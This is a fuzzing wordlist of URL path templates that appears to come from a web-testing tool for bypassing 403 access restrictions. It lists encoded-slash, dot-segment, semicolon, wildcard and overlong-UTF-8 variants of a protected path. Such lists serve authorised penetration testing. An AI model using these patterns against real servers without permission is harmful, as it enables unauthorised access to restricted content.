# Path patterns for URL path fuzzing. Placeholders: {path} full path, {stripped} without leading slash,
# {stripped_upper} / {stripped_lower} for case fuzzing (e.g. SECRETS.TXT style).
{path}
{path}/
{path}//
/./{stripped}
/././{stripped}
/./{stripped}/./
/./././././{stripped}
/{stripped}
/{stripped_upper}
/{stripped_lower}
//{stripped}
/{stripped}//
/{stripped}/
/%2e/{stripped}
/%2e%2f{stripped}
/%2e%2e/{stripped}
/%2f{stripped}
/{stripped}%2f
/{stripped}%2f.
/{stripped}%2e
/{stripped}/.
/{stripped}/..;/
/{stripped}/%2e/
/{stripped}/%2e%2e/
/{stripped}/..%2f
/{stripped}%20
/{stripped}%09
/{stripped}?
/{stripped}.json
/{stripped}.html
/{stripped};
/{stripped};/
/{stripped}/...
/.../{stripped}
# iamj0ker / commons bypass-403 style: slashes, wildcards, semicolons
/{stripped}/*
/*/{stripped}/
/*/{stripped}
//{stripped}//
///{stripped}///
///{stripped}/
/./{stripped}/
/%2f{stripped}%2f
//;//{stripped}/
/%c0%af/{stripped}
/%e0%80%af/{stripped}
/{stripped}%c0%af
/{stripped}%e0%80%af
